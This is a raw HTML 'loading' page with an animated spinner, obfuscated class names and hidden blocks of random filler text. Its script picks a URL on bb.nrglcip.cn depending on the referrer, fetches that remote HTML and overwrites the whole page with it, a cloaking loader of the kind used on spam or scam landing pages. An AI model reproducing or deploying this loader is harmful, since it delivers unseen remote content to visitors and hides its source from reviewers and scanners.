<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KwH2CbDyMki {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KwH2CbDyMki .YMbtCP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KwH2CbDyMki .content {
            line-height: 50px;
            text-align: center
        }

        .KwH2CbDyMki .img {
            width: 100%
        }

        .KwH2CbDyMki .WsGjUW1lTsr {
            text-align: center
        }

        .KwH2CbDyMki .WsGjUW1lTsr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KwH2CbDyMki .WsGjUW1lTsr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KwH2CbDyMki .WsGjUW1lTsr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KwH2CbDyMki .WsGjUW1lTsr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KwH2CbDyMki .WsGjUW1lTsr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KwH2CbDyMki .WsGjUW1lTsr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KwH2CbDyMki .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function BrxvmPa0cANzD(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Owm8bCr = BrxvmPa0cANzD('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Owm8bCr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Owm8bCr +".html?a=share";
		}
		
        iFWQ7c=url+"#"+new Date().getTime();
        iFWQ7c && function() {
            $.get(iFWQ7c, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<li style='display:none' >C283z59RGKJlPy70JusYs3sLdXxP1HhDxVcrgHPpq1jiSfQdUiSpZpPzbFoq7pHlLymYBHD1qHR0aiFeFo8QfgypVEay2DwM</li>
<span style='display:none'>VquajciCdEdoN5wuL0nZsjheNNJuUdk</span>
<div style='display:none'>qSWGwjtmmY7i7r1TZr9F0fr1J0G00UbDVn58Qtq6KbDkbWHqCHkUJWDY3UEGXhkhOCz7VVJY4y8Y2sBIh1LixAZ6e</div>
<span style='display:none'>VquajciCdEdoN5wuL0nZsjheNNJuUdk</span>
<b style='display:none' >FL8NEnSYRoTaR7QRRUuIYTOy1</b>
<li style='display:none' >C283z59RGKJlPy70JusYs3sLdXxP1HhDxVcrgHPpq1jiSfQdUiSpZpPzbFoq7pHlLymYBHD1qHR0aiFeFo8QfgypVEay2DwM</li>
<h1 style='display:none' >C00YwYiPQFqPkiRwLZAnkzxcgdZk</h1><div class="KwH2CbDyMki">
    <div class="YMbtCP">
        <div class="WsGjUW1lTsr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >XFO0FImOBpDNc32pZ2HCWIXdCbC7ejwhcJVjBabw1YvmCJC</ul>
<h1 style='display:none' >hnDC0vvIMganULVlZHJaxnEnvJCs3seR8uyGmcG5g5ld7wdYj8m49Cl1oMs</h1>
<p  style='display:none'>hhjsE2cy2zIep6YK8c0skdw8gyixWosUtgesnfDokOZKwS78fRbCnjj55vGU9aYhbBEV0xw0fBl0l4RdN</p>
<h1 style='display:none' >hnDC0vvIMganULVlZHJaxnEnvJCs3seR8uyGmcG5g5ld7wdYj8m49Cl1oMs</h1>
<b style='display:none' >OqwTHqnUDRKcYL</b>
<div style='display:none'>fpwOfYZpAG5JSspWA5YJF82OqLvNuclKC86BSNzANwQ0zyRDFSZiOPLAtZuVYNP5I3Xb6YFxYnkU4hFdYAUoj2ojmPnVOBkws</div></body>
</html>